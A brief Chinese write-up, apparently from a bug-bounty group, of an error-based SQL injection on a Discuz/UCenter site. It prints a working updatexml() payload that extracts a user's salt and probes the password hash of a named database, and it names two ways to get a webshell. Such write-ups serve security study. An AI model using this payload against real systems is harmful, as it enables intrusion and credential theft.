习科赏金猎人upate注入解析

服务器采用Windows 2008 R2 + IIS 7.5 + PHP +MYSQL搭建,Web系统采用Ucenter + Discuz + Supesite + Uchome + 自开发程序

I. 下手点

目前发现有两个严重的注入点,均位于自开发程序中。
一个是Google收录某页面的调试工具,一个是Google收录的demo程序,以前者为例。

II. 注入点

注入语句(密码已经做处理了)

/c/php/settime.php?id=943126&expiretime=2016-06-26'or+updatexml(1,concat(0x3a,(select+salt+from+vanpeopl_ucenter.uc_members+where+uid=1+and+left(password,32)='d3c8ea6bbf7XXXXX905244699aX'+limit+0,1),0x3a),0)+--+

知识点有:updatexml()注入,类似MySQL报错注入,可以参见mysql报错注入原理
但这里updatexml()的回显只有31个字符,所以在后面还用到了left取32位,盲猜最后一位密码。

III. 取webshell

比较容易,有2种方式

一种是supesite取权限
还有一种是通过uckey获取权限

IV. 结尾

文章虽短,但是值得好好琢磨。